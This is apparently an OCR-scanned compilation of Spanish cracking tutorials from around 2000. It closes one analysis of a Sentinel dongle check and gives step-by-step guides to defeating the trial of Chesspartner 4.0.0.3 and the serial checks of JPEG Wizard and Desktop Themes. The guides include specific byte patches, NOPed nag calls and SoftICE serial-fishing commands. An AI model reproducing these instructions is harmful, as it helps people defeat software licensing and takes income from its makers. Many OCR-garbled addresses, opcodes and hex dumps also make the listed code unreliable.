005C3028 mov ax, 1C00h // retorna otro misterioso código de error 

005C302C retn 4 // y retorna 


005C302C sub_5C3000 endp 


El código anterior intenta cargar el dispositivo virtual que controla la mochila. Según el funcionamiento de la función 
CreateFileA, si se pudo abrir el dispositivo, se retorna un valor diferente a INVALID_HANDLE_VALUE que es una constante 
del API de Windows que equivale a -1 (FFFFFFFFH). La rutina comprueba esta condicición en la línea 5C301A mediante la 
instrucción cmp eax,OFFFFFFFFh. Se guarda el handle, aúnque este no sea válido y se retorna el valor 1C0Bh si no se pudo 
abrir el dispositivo y 1C00h si se obtuvo un handle válido. 

Por lo tanto sabemos que esta función siempre devolverá uno de estos dos valores. Nuestro código de error que indica que 
todo va bien es el 1C00h. 

Si continuamos trazando hasta ejecutar el ret veremos algo así: 


005C30B0 sub_5C30BO0 proc near ; CODE XREF: sub_5C2D80+5 p 
005C30BO0 sub esp, 4 

005C30B3 push esi 

005C30B4 mov esi, [esp+0Ch] 

005C30B8 lea eax, [esp+4] 

005C30BC push eax 


005C30BD call sub_5C3000 -> Aquí se llama a la rutina anterior 
005C30C2 mov [esi+6], ax -> guarda el código de error retornado 
005C30C6 or al, al -> comprueba si AL = 0 

005C30G8 j¡z short loc_5C30D9  -> salta si es O 

005C30CA or ah, ah -> comprueba si AH =0 

005C30CC ¡nz short loc_5C30FA  -> salta si AH = 0 

005C30CE or ax, 1C00h -> solo llegaráremos aquí en caso de que la llamada a 5C3000 retorne 
1C0B, esto hace que AX valga 1C0B siempre 

005C30D2 pop esi -> restaura la pila 

005C30D3 add esp, 4 

005C30D6 retn 4 -> y regresa con código de error 1C0Bh 


Si se pudo cargar el driver, se tomará el salto en 5C30C8 que nos llevará hasta aquí: 


005C30D9 loc_5C30D9: ; CODE XREF: sub_5C30B0+18|j 


005C30D9 mov eax, [esp+4] -> carga Handle al dispositivo SENTINEL.VXD 


005C30DD push esi -> empuja un parámetro que no sabemos aún que es 
005C30DE push eax -> pasa handle de SENTINEL.VXD 

005C30DF call sub_5C3030 -> llama a una función (ver más abajo) 

005C30E4 mov eax, [esp+4] 

005C30E8 push eax 


005C30E9 call sub_5C3090 
005C30EE mov ax, [esi+6] 
005C30F2 or ah, ah 

005C30F4 ¡nz short loc_5C30FA 


005C30F6 or ax, 1C00h -> Otra vez el misterioso código de error 
005C30FA loc_5C30FA: -> aquí sólo llegamos desde 5C30CC 
005C30FA pop esi 


005C30FB add esp, 4 
005C30FE retn 4 


| Previamente se abrió el driver SENTINEL.VXD, por lo que es lógico pensar que este código enviará datos al driver y este a la 


mochila. La aplicación solo tiene una manera de comunicarse con el VXD y es mediante la función DevicelOControl. La 
función DevicelOControl tiene la siguiente forma: 


BOOL DeviceloControl( 


HANDLE hDevice, // handle to device of interest 

DWORD dwloControlCode, // control code of operation to perform 
LPVOID IpinBuffer, // pointer to buffer to supply input data 
DWORD nInBufferSize, // size of input buffer 

LPVOID IpOutBuffer, // pointer to buffer to receive output data 
DWORD nOutBufferSize, // size of output buffer 


LPDWORD IpBytesReturned, // pointer to variable to receive output byte count 
LPOVERLAPPED IpOverlapped  // pointer to overlapped structure for asynchronous operation 
); 


Si continuamos trazando dentro de las funciones veremos que nuestras predicciones se cumplen. Este es el código que 
verás al entrar en la función llamada en la linea 5C30DF: 


005C3030 sub_5C3030 proc near ; CODE XREF: 5C30DF 
005C3030 sub esp, 4 


005C3033 push esi -> empuja ESI 
005C3034 mov esi, [esp+10h] -> carga ESI de nuevo (esto no es necesario) 
005C3038 push esi -> y lo vuelve a empujar a la pila 


005C3039 mov word ptr [esi+6], OFFFFh -> establece posición de memoria a FFFFh 
005C303F call sub_5C2990 
005C3044 lea eax, [esp+4] 


005C3048 push 0 -> pasa NULL como puntero a una estructura para las operaciones 
asincronas 

005C304A push eax -> pasa puntero a una variable que recibira el numero de bytes de salida 
en mi caso 9CF694 

005C304B push 0 -> Tamaño del buffer de salida O 

005C304D xor eax, eax -> borra EAX 

005C304F push 0 -> pasa NULL como buffer donde recibir datos 

005C3051 mov ax, [esi+2] -> carga en AX el tamaño del buffer de entrada 

005C3055 push eax -> tamaño del buffer de datos de entrada 

005C3056 push esi -> Pasa el buffer con información 

005C3057 mov eax, [esp+24h] -> Carga handler del VXD en EAX 

005C305B push 1 -> código de operación 1 

005C305D push eax -> pasa handle como primer argumento 

005C305E call ¡_DeviceloControl -> Envia comandos al dispositivo VXD, y retorna 1 si todo OK 
005C3063 push esi -> pasa de nuevo el buffer de entrada 

005C3064 call sub_5C2950 -> realiza muchos calculos sobre la estructura 

005C3069 cmp word ptr [esi+6], OFFFFh -> comprueba los datos del buffer de entrada 

005C306F ¡nz short loc_5C3077 -> sino es igual salta 

005C3071 mov word ptr [esi+6], 1C3Bh -> guarda 1C3B en el buffer de entrada 

005C3077 loc_5C3077: ; CODE XREF: 5C306F 

005C3077 mov ax, [esi+6] -> guarda en AX datos del buffer 


005C3078B pop esi -> restaura la pila 


| 005C307C add esp, 4 
005C307F retn 8 -> y retorna con código en AX = 400h 
005C307F sub_5C3030 endp 


| Como era de esperar este código prepara los argumentos para la función DevicelOControl y posteriormente en la línea 
| 5C3064 se llama a una función (5C2950) la cual realiza una serie de cálculos sobre la estructura pasada en ESI. No he 
| incluido estos cálculos por ser muy extensos. 


| Si continuamos trazando después de la llamada veremos que el programa toma el salto en 5C306F y retorna en AX el valor 
| que habia en el buffer de entrada apuntado por [ESI+6]. Continuamos hasta ejecutar el ret y estaremos al principio: 


005C30DF call sub_5C3030 -> venimos de aquí 

005C30E4 mov eax, [esp+4] -> estamos aquí, carga en EAX en Handle del VXD 
005C30E8 push eax -> Pasa handle 

005C30E9 call sub_5C3090 -> llama a función que cierra el VXD con CloseHandle y retorna 1C00 en 
EAX 

005C30EE mov ax, [esi+6] -> recuperamos el valor de retorno 

005C30FP2 or ah, ah -> comprueba si AH =0 

005C30F4 ¡nz short loc_5C30FA -> no, salta 

005C30F6 or ax, 1C00h -> todo bien 

005C30FA loc_5C30FA: -> aquí sólo llegamos desde5C30CC 

005C30FA ; y desde 5C30FA 

005C30FA pop esi 


005C30FB add esp, 4 
005C30FE retn 4 


| 


| Bueno por todo lo que tenemos hasta ahora parece que el programa utiliza códigos de error para comprobar el exíto de sus 

| operaciones, por lo que podemos deducir, el código que indica que todo va bien es 1C00h y cualquier otra cosada un error. 

| Aún así hemos comprobado que la comuncación con el VXD se cierra en cualquier caso, por lo que podemos sospechar que 
| el programa volverá a abrir el VXD con CreateFileA y volverá a establecer comunicación con este. 

| Reactivaremos nuestros breakpoints (si los habias borrado, vuelvelos a crear) y pulsaremos g en Softlce para continuar. 

| Veremos que de nuevo el Softlce se activará, pulsamos F12 para ver desde donde se llamó a CreateFileA y veremos que ya 
habiamos pasado por aquí, estamos de nuevo en 5C3000. Esto nos da otra pista, parece que la función en 5C3000 se utiliza 
en más de un sitio, por lo que vamos a pulsar de nuevo F12 para ver desde donde se llamó. Para nuestra sorpresa veremos 
| que a sido llamada desde 5C30BD y aquí ya estuvimos antes, por lo que pulsaremos de nuevo F12. Ahora veremos que 
estamos en una nueva dirección: 


005C2D80 sub_5C2D80 proc near ; CODE XREF: sub_5C23B0+43 p 
005C2D80 mov eax, [esp+4] 

005C2D84 push eax 

005C2D85 call sub_5C30B0 

005C2D8A retn4  ->ESTAMOS AQUÍ 

005C2D8A sub_5C2D80 endp 


| : 
Bueno parece que no hay muchas opciones por lo que pulsaremos F12 de nuevo y veremos: 


005C24ED call sub_5C23B0 

005C24F2 mov [esi+6], ax  -> ESTAMOS AQUÍ, guarda resultado en ESI+6 
005C24F6 pop esi -> reajusta la pila 

005C24F7 add esp, 4 

005C24FA retn 4 -> y retorna 


| 
notese como se almacena en [esi+6] el resultado de la función previa, pulsamos F12 de nuevo y vemos: 


005C396C mov word ptr [esi+6], 403h 

005C3972 

005C3972 loc_5C3972: ; CODE XREF: sub_5C3910+78 
005C3972 cmp word ptr [esi+6], 403h 

005C3978 ¡nz short loc_5C398A 

005C397A mov [esi+0Ah], bl 

005C397D push esi 


005C397E call sub_5C2460 -> venimos de aquí 
005C3983 inc bl -> incrementa contador 
005C3985 cmp bl, 3 -> llevamos 3 intentos ? 


005C3988 jbe short loc_5C3972 -> No, continua en 5C3972 


005C398A 

005C398A loc_5C398A: 
005C398A mov ax, [esi+6] 
005C398E mov cx, ax 
005C3991 and cl, 9 
005C3994 cmp cl, 9 
005C3997 ¡nz short loc_5C39A2 
005C3999 mov ax, 3 
005C399D pop esi 

005C399E pop ebx 
005C399F retn 8 

005C39A2 loc_5C39A2: 
005C39A2 push eax 
005C39A3 call sub_5C3110 
005C39A8 pop esi 

005C39A9 pop ebx 
005C39AA retn 8 

005C39AA sub_5C3910 endp 


; CODE XREF: sub_5C3910+68 j 
-> carga en AX resultado de la función 
-> lo copia a CX 
-> realiza un AND sobre el byte bajo del resultado 
-> es 97 
-> no, salta a 5C39A2 
-> si, devolvemos 3 
-> reajusta pila 


-> y retorna 
; CODE XREF: sub_5C3997 

-> pasa resultado como parametro a la función siguiente 
-> llama a una función,valor de retorno en EAX 

-> restaura pila 


-> y retorna. 


El programa realiza tres intentos (línea 5C3985) para comprobar la mochila y después de eso lee el valor de retorno de esi+6 
realiza un AND con nueve y comprueba el resultado con 9, ni no es igual la función retorna 3 en AX (línea 5C3999) y sale. Si 


continuas trazando hasta ejecutar el ret, veras que después te aperecerá el código al cual hemos llegado utilizando el 
metodo del MessageBox(pincha aquí para ir a este código), a partir de aquí el modus operandi es el mismo :). Con esto 


queda demostrado que siempre existe más de una puerta de entrada. 


por Black Fenix. http://www.blackfenix.cjb.net/ 


La información aquí vertida es exclusivamente para uso educacional, no puedo hacerme responsable del uso que se 
haga de esta, por lo que atiendo a la honradez de cada uno :), recuerda que debes comprar el software que utilices :) 
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Programa: Chesspartner 4.0.0.3 


PROTECCION: Trial 30 dias 


Descripcion: 


Un buen juego de ajedrez 


Dificultad: Principiante+ 


Herramientas: | SmartCheck v6.x 


CRACKER: Mongui FECHA: 17/08/2000 


| INTRODUCCION 


Chesspartner v 4.0.0.3 


Programa de ajedrez con multiples opciones y posibilidades, tanto de aprendizaje como 
de configuración, uno más para los amantes de este deporte. 


El programa esta completamente operativo durante 30 días, despues de los cuales, 
claro, deja de funcionar; tiempo insuficiente para comprobar todas sus funciones, asi 
que vamos a intentar alargar el tiempo de prueba. 


Tiene la opción de registro mediante serial, pero yo al menos no lo he conseguido. 


AL ATAKE 


Lo primero es caducar el programa (adelantamos el reloj de windows un par de meses) y nos 


sale el mensaje "The evaluation period for Chesspartner....... Ms 


Bien,tiramos del W32dasm y lo desensamblamos sin problemas (no esta comprimido ni nada 
extraño) y nos vamos a las string data references y buscamos la frasecita de arriba, doble 
click y aparecemos aqui. 


Si nos fijamos un poco más arriba vemos una comparación y un salto, ¡¡¡¡¡Quietorrrrr!!!!, 
seguro que ya pensabas en invertir el salto, pues no hombre, no es tan facil. 


Ves el call que hay arriba, ponte sobre el y dale al cursor derecha para ir a esta llamada y 
llegas aquí: 


Bueno, aqui el programa despues de una comparación con cero produce un salto, que en este 
caso si que vamos a invertir, apuntamos el offset en la barra abajo (1A4D6) y con tu editor 
hexadecimal favorito inviertes el salto cambiando el 7405 por 7505 con lo cual la 
instrucción pasa de ser je a jne (salta si no es equivalente). 


Bien, el programa ya Carga bien, sea cual sea la fecha pero sale una nag screen muy pesada 
al principio que nos invita a registrarnos y no solo eso, sino que cuenta los dias uno a uno 
con un considerable retraso que se hace muy pesado y si deseamos salir del programa nos sale 
otra nag recordandonos que nos registremos. 


Vamos a quitar las nags. 


Cargamos el Softice y esperamos a que salga la primera nag; vamos a poner un bpx cuando 
desaparezca la ventana y saber que función es llamada y asi poder desactivarla, esto se hace 
entrando en el softice (control + D) y tecleando HWND con lo cual nos sale el número de 
procesos que hay en ese momento en el ordenador, buscamos el del programa que estamos 
ejecutando y el correspondiente al botón continuar, llegados a este punto he de decir que yo 
he usado otro programa para hallar el handle y que es un programa que saque de la pagina web 
de Spanish reverse engenering y que se llama Win_id, solo hay que ejecutarla y poner el 
cursor soble el botón continuar y nos dice el handle, mucho más rapido y sencillo que con 
softice. 
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Aqui vemos el programa de fondo de ajedrez y el programa win identifier de Black Fenix en 
primer plano, despues de poner el cursor sobre continue, y vemos que en la parte de arriba 
del programa win identifier esta el Hwnd que es 0394 y que Cambia en cada ordenador asi que 
no pongas el mio. 


Bien sigamos, vamos al softice y ponemos Bmsg 0394 Wm_destroy (Softice saltará cuando se 
destruya esta ventana) damos a f5 y nos vamos a pulsar el botón continue, salta el softice y 
nos vamos de caza, despues de unos cuantos f12 llegamos a la sección de nuestro programa, 
algo asi como cp4.txt y alli vemos la dirección de memoria que ejecuta la orden de creación 
de la ventana algo asi como: 


004252e8 834dfcff or dword ptr [ebp-4], ffffffff 


Apuntamos la dirección y nos vamos al w32dasm, cargamos el programa y vamos a la dirección 
004252e8: 


I 
:004252E3 ES?2C50000 Call 00431854 


:004252EC 8D4D8C lea ecx, dword ptr [ebp-74] 


bien, el call de arriba es el que llama a la ventana de recordatorio, asi que nos situamos 
sobre el call y apuntamos el offset en la ventana de abajo (252E3), nos vamos al editor 
hexadecimal, yo uso el Hview y vamos a anular la llamada con nops asi que nos ponemos en la 
dirección y sustituimos E872C50000 por 9090909090, recuerda tantos bites quitas, tantos 
pones. 


Ejecutamos el programa y ya entramos directamente en el programa. 


Para quitar la segunada nag, la que apararece al salir,hacemos lo mismo, localizamos el 
handle sobre el botón exit, ponemos un bpx para saber cuando desaparece la ventana,nos 
situamos sobre el programa con f12 (unos cuantos), apuntamos la dirección de memoria, 
cargamos al W32dasm y vamos a esta dirección, nos situamos sobre el call anterior, apuntamos 
el offset y con un editor hexadecimal nopeamos la llamada, con lo cual el programa va de 
maravilla y podemos evaluarlo con toda la calma del mundo. 


Además de parchear el ejecutable tambien puedes hacer un crack o un cargador con las muchas 
utilidades que hay aunque eso es otra historia. 


Quiero dar las más encarecidas gracias a todas las personas que hacen que la informatica 
tenga un nuevo sentido en mi vida, el del apasionante mundo de la ingieneria inversa, porque 
sin su ayuda nuestro esfuerzo naufragaria una y otra vez contra la ignorancia, ellos son los 
dioses del ciberespacio y son las personas que con su desinteres hacen que merezca la pena 
estar delante del ordenador dos horas haciento este tuto; gracias a todas las paginas que 
nos enseñan a preguntarnos el porque de las cosas, a investigar, a descubrir y ser curiosos, 
a los ECD, la pagina de Karpoff,Reversed Minds, etc..... GRACIAS¡¿GRACIAS¡¿GRACIAS DE VERDAD. 


SI USAS ESTE PROGRAMA PARA ALGO MÁS QU 
PONES A PROGRAMAR, SABRAS DE SOBRA A Q 


PARA EVALUARLO, DEBES DE COMPRARLO, SI ALGUNA VEZ TE 
E REFIERO. 


Cc Ha 
= 
S 


El ajedrez es la vida. 


(Bobby Fischer). 


La ingenieria inversa es lo más parecido que he encontrado al ajedrez. 


(Mongui'00). 


sobre 
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JPEG WIZARD 1.3.0.4 


Programa: 


PROTECCION: Serial. Ejecutable comprimido 


Descripcion: 


Programa para optimizar las imagenes en formato .jpeg 


Dificultad: Principiante 


Softlce v3.25, Hview 6.16 


CRACKER: Mongui FECHA: 17/08/2000 


| INTRODUCCION 


Este programa sirve para optimizar las fotografias en formato .jpeg, añadirles 
efectos, etc...nado de otro mundo, pero de lo que se trata es de aprender y compartir 
lo aprendido. 


Herramientas: 


AL ATAKE 


El ejecutable esta comprimido con el UPX, lo podemos descomprimir y desamblar, yo en su 
momento lo hice con Procdump (de 700 k a 2800 k el archivito) y lo desensamble con W32dasm 
(unos 20 minutos en un 500), pero despues de varias vueltas vi que no me era rentable 
atacarlo de esta manera, asi que use el Softice. 

Cargamos softice, ejecutamos el programa y vamos a registro, introducimos un nombre y un 
serial cualquiera. 


Ctrl1+D y vamos al softice, ponemos los bpx más frecuentes pero no me salta asi que al 
final pruevo con bpx hmemcpy y este si que va. 


Ya estamos de nuevo en el softice pulsamos de nuevo ctrl+d para que sigamos la pista al 
serial, si no lo hacemos asi, seguiriamos la pista al nombre (+Mongui he usado yo). 


Ahora hay que ir a la parte del programa ya que si te fijas estas en la dll user32, para 
ello pulsamos F12 unas cuantas veces (7) y nos situamos en Jwizard!upx+00037E71, bien, ahora 
estamos en la zona de memoria en la que se esta ejecutando nuestro programa, ahora vamos a 
pulsar F10 unas cuantas veces (10 más o menos) hasta que llegamos a un call seguido de un 
salto que nos lleva fuera a la nag que nos dice que somos unos mentirosos, lo cual nos hace 
pensar que el salto despues del call lo hara en función de si el serial es el correcto o 


no. 


Bueno, a estas alturas alguno habrá pensado cambio el salto y listo, si vale, yo tambien lo 
hice como buen newbie que se precie y el programa nos acepta cualquier registro, pero 
despues de cerrar el programa no guarda los cambios y nos dice que seguimos sin registrar, 
asi que lo que vamos a hacer el entrar en la llamada anterior al salto haber que diantres 
hay y mirar a ver si tenemos un serial valido para nuestro original nombre. 


Para entrar en el call 00404014 nos ponemos sobre el con F10 y con F8 entramos dentro y 
vemos lo siguiente: 


(Nota: Esta imagen la saque de W32dasm despues de Casi 20' ) 


Bueno, seguimos, que nadie se pierda por favor; con F10 vamos hasta mov esi,eax y ponemos D 
eax y aparece 114676563, otro F10 y nos ponemos sobre mov edi,edx, ponemos D edx y aparece 
nuestro serial falso, y despues viene una comparación, me parece que ya lo tenemos. 


bc * para quitar los breakpoints y provamos el serial con nuestro nombre y funciona. 


Agradecimientos: Muchisimas gracias a todas las personas que nos hacen ver la informatica 
desde otro punto de vista fascinante, otra fascinante faceta de este gran mundo...... en 
especial a los ECD y a la pagina de Karppof y a la de Reversed Minds. 


(Mongui'00). 
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Programa: Desktop Themes v1.89 


PROTECCION: Pescar el Serial Number 


Descripcion: Utilidad personalización del sistema 
Dificultad: Principiante++ 


DOWNLOAD: http: //www.|ss.com.au 


Herramientas: Softl CE v4.05 - Depurador 


CRACKER : MeGaBiTe | FECHA: | 22/08/2000 


INTRODUCCION 


Toma de Contacto con El Programa: 


Antes de empezar, deberemos como siempre recabar un poco de información a fin de 
saber exactamente lo que tenemos que hacer. En primer lugar ejecutamos el programa, y 
comprobamos que nos deja ejecutarlo en versión durante 30 días, después de lo cual 
nos lo deja en versión Lite, con algunas funciones desactivadas. Según el autor, para 
ambas versiones hay que registrar el programa. Nosotros lo haremos para la versión 
Stándard, totalmente funcional. Todo esto se consigue introduciendo un serial. 


En realidad, no entiendo que quiere decir el programador con registrar las dos 
versiones, pero en fin, estos estúpidos e ineptos "creadores" hacen de sus bichitos 
inútiles aplicaciones cuando se les aplica la premisa de "comercial". 


Dejémonos de Zarandajas y vayamos a por el Serial, que es lo que nos interesa. 


AL ATAKE 


Acerca de éste sistema de protección 


La protección de éste programa consta de un Name y un Code que debemos introducir para que la pestaña 
'Edit Theme' se active y nos permita editar los diferentes elementos de los Themes. 


El ensayo 


Bueno, lo primero que vamos a intentar es hacer break en el código del programa para ver qué nos 
encontramos por ahí dentro. Probaremos en primer lugar con las funciones API más comunes en éstos casos; 
éstas son 'getWindowTextA' y 'getDlgltemTextA!. 


Vamos a activar Softl CE pulsando Ctrl-D; una vez en el interface de Softl CE ponemos un par de breakpoints 
en las funciones anteriormente mencionadas. Para éllo, escribimos: "BPX getWindowTextA", pulsamos 
Intro y de nuevo escribimos: "BPX getDlgltemTextA", e Intro. Pulsamos F5 para regresar a la aplicación, 
una vez allí activamos la pestaña 'Edit Theme' con lo cual podremos ver las edit box en las que introducir la 
información de usuario. En la edit box 'Name' yo he introducido 'MeGaBiTe' y en la edit box 'Code' he 
introducido '1193046'. Ahora pulsamos el botón 'Ok.. 


SoftlCE hará break al inicio de la función getDlgltemTextA; como no nos interesa tracear ésta función de 
librería, pulsamos F11 para salir de la función e ir a la instrucción siguiente a la que realizó dicha llamada. 
Con éllo, ésto es lo que veremos: 


0177:0040D056 CALL EDI 

0177:0040D058 PUSH 0043041C >Aterrizamos aquí 
0177:0040D05D LEA ECX, [EBP+FEFFFEBDO] 
0177:0040D063 CALL 00403875 
0177:0040D068 CMP [EBP-4C],BL 
0177:0040D06B  JZ 0040D081 
0177:0040D06D LEA EAX, [EBP-4C] 
0177:0040D070 LEA ECX, [EBP+FEFFFEFBDO] 
0177:0040D076 PUSH EAX 

0177:0040D077 PUSH 00430600 
0177:0040D07€ CALL 00403ED4 
0177:0040D081  CMP [EBP-24],BL 
0177:0040D084  JZ 0040D09A 
0177:0040D086 LEA EAX, [EBP-24] 
0177:0040D089 LEA ECX, [EBP+FEFFFFBDO] 
0177:0040D08r PUSH EAX 

0177:0040D090 PUSH 004305F8 
0177:0040D095 CALL 00403ED4 
0177:0040D09A PUSH DWORD PTR [EBP+0C] 
0177:0040D09D CALL 00405572 >Traceamos hasta aquí 
0177:0040D0A2 TEST EAX, EAX 
0177:0040D0A4 POP ECX 

0177:0040DOA5  JZ 0040D22F 
0177:0040DOAB PUSH 28 

0177:0040DOAD CALL 00404B41 
0177:0040D0B2 POP ECX 

0177:0040D0B3 PUSH EAX 

0177:0040D0B4 LEA EAX, [EBP-022C] 
0177:0040DOBA PUSH EAX 

0177:0040DOBB CALL [KERNEL32!1strcpy] 
0177:0040D0C1  CMP BYTE PTR [EBP-4C],54 


Continuamos traceando todo éste código hasta que lleguemos a la instrucción 'CALL 00405572' en la posición 
'0040D09D'. Una vea hayamos llegado a ésa instrucción pulsamos F8 para tracear dentro de la función. Una 
vez dentro de la misma éste es el código con el que nos encontramos: 


0177:0040556F  RET 0010 

0177:00405572 PUSH EBP >Empezamos en ésta instrucción 
0177:00405573 MOV EBP,ESP 

0177:00405575 SUB ESP,00000274 

0177:0040557B MOV EAX, [EBP+08] 

0177:0040557E AND DWORD PTR [EBP-04],00 
0177:00405582 PUSH EBX 

0177:00405583 PUSH ESI 

0177:00405584 AND BYTE PTR [EAX+000009A0],00 
0177:0040558B LEA ESI, [EAX+000009A0] 
0177:00405591 MOV EBX, 0043041C 

0177:00405596 PUSH EDI 

0177:00405597 PUSH EBX 

0177:00405598 LEA ECX, [EBP-0274] 
0177:0040559E MOV DWORD PTR [EBP-74],80000002 
0177:004055A5 MOV DWORD PTR [EBP-30],00000028 


Bueno, seguimos traceando hasta que lleguemos ésta instrucción: 


0177:004055FB LEA EAX, [EBP-2C] >Pone nuestro Name en EAX 
0177:004055FE PUSH 004305F0 

0177:00405603 PUSH EAX 

0177:00405604 CALL 00426C80 

0177:00405609 POP ECX 

0177:0040560A TEST EAX, EAX 

0177:0040560C POP ECX >Esta instrucción es muy interesante 


Como hemos anotado la instrucción 'LEA EAX,[EBP-2C]' pone en el registro EAX lo que hay en la posición de 
memoria apuntada por el registro EBP menos '2C', que es justamente nuestro Name. Ahora vamos a seguir 
traceando otro poco más hasta la intrucción 'POP ECX' que hemos comentado. Efectivamente, es muy 
interesante puesto que recupera de 

la pila el valor '' y lo pone en el registro ECX. Si ahora, en la línea de comandos de Softl CE, escribimos "D 
ECX" y observamos la ventana Data de SoftlCE veremos lo siguiente: 


017F:004305F0 52 48 6F 6F 44 00 00 00-52 65 67 43 6F 64 65 00  RHooD...RegCode. 
017F:00430600 52 65 67 4E 61 6D 65 00-25 54 68 65 6D 65 44 69 RegName.S%ThemeDi 
017F:00430610 72 25 44 54 4C 53 53 5F-50 56 54 5C 4C 6F 67 6F rsDTLSS_PVIXLogo 
017F:00430620 53 2E 73 79 73 00 00 00-25 54 68 65 6D 65 44 69 S.sys...SThemeDi 
017F:00430630 72 25 44 54 4C 53 53 5F-50 56 54 5C 4C 6F 67 6F  rs$DTLSS_PVIXLogo 
017F:00430640 57 2E 73 79 73 00 00 00-25 54 68 65 6D 65 44 69 W.sys...SThemeDi 
017F:00430650 72 25 44 54 4C 53 53 5F-50 56 54 5C 4C 6F 67 6F rsDTLSS_PVIXLogo 
017F:00430660 2E 73 79 73 00 00 00 00-4C 6F 67 6F 53 2E 69 6E  .sys....LogoS.in 


017F:00430670 69 74 69 61 6C 00 00 00-25 57 69 6E 64 69 72 25. itial...SWindirs 


¿"RHooD"? Suena como si fuera el nick de algún cracker. ¡Qué raro! Bueno, sigamos traceando un poco más 
y veamos qué ocurre. Bueno, pues rápidamente nos cruzamos con el siguiente código: 


0177:00405613 LEA EAX, [EBP-2C] 

0177:00405616 PUSH 004305E8 >Manda un valor a la pila 
0177:0040561B PUSH EAX >Manda otro valor a la pila 
0177:0040561C CALL 00426C80 >Y hace algo 
0177:00405621 POP ECX 

0177:00405622 TEST EAX, EAX 

0177:00405624 POP ECX 

0177:00405625 JZ 004059B4 

0177:0040562B LEA EAX, [EBP-2C] 

0177:0040562E PUSH 004305DC 

0177:00405633 PUSH EAX 

0177:00405634 CALL 00426C80 

0177:00405639 POP ECX 

0177:0040563A TES EAX, EAX 

0177:0040563C POP ECX 

0177:0040563D JZ 004059B4 


Bien. Analicemos las instrucciones que hemos comentado. La instrucción 'PUSH 004305E8' en la posición 


'00405616' envía algo a la pila. Si en la línea de comandos de Softl CE escribimos "D 004305E8" veremos en 
la ventana Data lo siguiente: 


017F:004305E8 72 6F 6D 65 6F 00 00 00-52 48 6F 6F 
017F:004305F8 52 65 67 43 6F 64 65 00-52 65 67 4E 
017F:00430608 25 54 68 65 6D 65 44 69-72 25 44 54 
017F:00430618 50 56 54 5C 4C 6F 67 6F-53 2E 73 79 
017F:00430628 25 54 68 65 6D 65 44 69-72 25 44 54 
017F:00430638 50 56 54 5C 4C 6F 67 6F-57 2E 73 79 


017F:00430648 25 54 68 65 6D 65 44 69-72 25 44 54 4 


00 00 00. romeo...RHooD... 
6D 65 00  RegCode.RegName. 
53 53 5F SThemeDirsSDTLSS_ 
00 00 00  PVIXLogoS.sys... 
53 53 5F SThemeDirsSDTLSS_ 
00 00 00 PVIALogoW.sys... 


53 53 5F SThemeDirsSDTLSS_ 


O SS 
Q OQAUaARdy 


¡Vaya, vaya! "romeo" ... "RHooD". Esto ya se aclara. Tiene toda la pinta de que nos encontramos con una 
'lista negra'. 'romeo' es un cracker famoso en la red. ¡A éste sí que lo conozco y he leído ensayos suyos! Lo 
que está haciendo el programa es comprobar si el Name que hemos introducido coincide con alguno de los de 
la "lista negra'. ¡Con toda probabilidad en el registro EAX esté nuestro Name y lo envía a la pila como uno de 
los dos parámetro que se pasan a la función de la instrucción siguiente (el 'CALL 00426C80'). Efectivamente 
si escribimos en la línea de comando de SoftlCE "D EAX" en la ventana Data veremos nuestro Name: 
"MeGaBiTe". 


Podemos observar además que el código va leyendo valores de la 'lista negra' hacia atrás, es decir, de las 
posiciones de memoria más altas a las más bajas. Por lo tanto vamos a pulsar, dentro de Softl CE, la 
combinación de teclas Alt-RePág y veremos lo siguiente: 


017F:00430408 2F 63 6F 6E 76 00 00 00-2F 69 6E 73 74 61 6C 6C.” /conv.../install 
017F:00430418 00 00 00 00 53 6F 66 74-77 61 72 65 5C 4C 65 66 ....SoftwarellLef 
017F:00430428 74 20 53 69 64 65 20 53-6F 66 74 717 61 72 65 5C” t Side Softwarel 
017F:00430438 44 65 73 6B 74 6F 70 20-54 68 65 6D 65 73 00 00 Desktop Themes.. 
017F:00430448 4C 61 6E 67 75 61 67 65-00 00 00 00 54 68 69 73  Language....This 
017F:00430458 20 70 72 6F 67 72 61 6D-20 72 65 71 75 69 72 65 program require 
017F:00430468 73 20 57 69 6E 64 6F 77-73 20 39 35 2F 4E 54 20 s Windows 95/NT 


017F:00430478 
017F:00430488 
017F:00430498 4 


[0] 
H> 
N 

A 


E 30 2E 00 00 00 00-46 6€C 61 67 73 32 00 00 4.0..... Flags2.. 
9 73 65 20 4E 69 65-6C 73 65 6E 00 00 00 00. Lise Nielsen.... 
69 61 6ÉE 61 20 4B 65-6C 6C 65 72 00 00 00 00 Diana Keller.... 


Ps 
Q 
dd 


017F:004304A8 45 6E 72 69 71 75 65 20-52 6F 73 61 72 69 6F 00 Enrique Rosario. 
017F:004304B8 4E 61 74 65 20 50 61 63-6B 65 72 00 44 69 65 67. Nate Packer.Dieg 
017F:004304C8 6F 20 4D 6F 6E 74 65 73-00 00 00 00 4B 65 6E 6E o Montes....Kenn 
017F:004304D8 65 74 68 20 42 6C 61 6E-73 65 74 74 65 00 00 00. eth Blansette... 
017F:004304E8 43 6F 6D 70 61 71 20 43-4F 2E 00 00 53 54 61 52 Compaq CO...STaR 
017F:004304F8 44 6F 47 47 00 00 00 00-57 69 6C 6C 69 61 6D 20 DoGG....William 


017F:00430508 
017F:00430518 
017F:00430528 
017F:00430538 
017F:00430548 
017F:00430558 
017F:00430568 
017F:00430578 


67 65 72 73 00 00-4A 65 66 66 65 72 79 20 Rogers. .Jeffery 
69 74 74 6F 00 00 00-42 6F 62 20 4A 6F 6E 65 Ditto...Bob Jone 
00 00 00 4C 6F 76 65-72 20 42 6F 79 00 00 00 s...Lover Boy... 
69 6C 6C 20 4D 61 79-65 72 00 00 54 69 6D 20 Bill Mayer..Tim 
6F 64 72 69 67 75 65-73 00 00 00 64 65 6C 6F.  Rodrigues...delo 
20 61 6C 61 69 6E 00-53 74 65 76 65 20 53 65 n alain.Steve Se 
65 72 64 6A 69 61 6E-00 00 00 00 41 6C 62 65 merdjian....Albe 
74 6F 20 41 20 4A 75-6E 69 6F 72 00 00 00 00. rto A Junior.... 


a 
NUHONNOR Nas 00d sas 
md 
E 


ZJ 00014 Js 


017F:00430588 4A 6F 68 6ÉE 20 46 6F 72-72 65 6C 6C 69 00 00 00 John Forrelli... 
017F:00430598 52 69 63 61 72 64 6F 20-47 6F 75 76 65 61 20 4D Ricardo Gouvea M 
017F:004305A8 65 6É 64 6F 6E 63 61 00-44 65 62 72 61 20 43 2E  endonca.Debra C. 
017F:004305B8 20 4D 61 79 6É 65 00 00-43 68 6F 6F 69 20 47 75 Mayne..Chooi Gu 
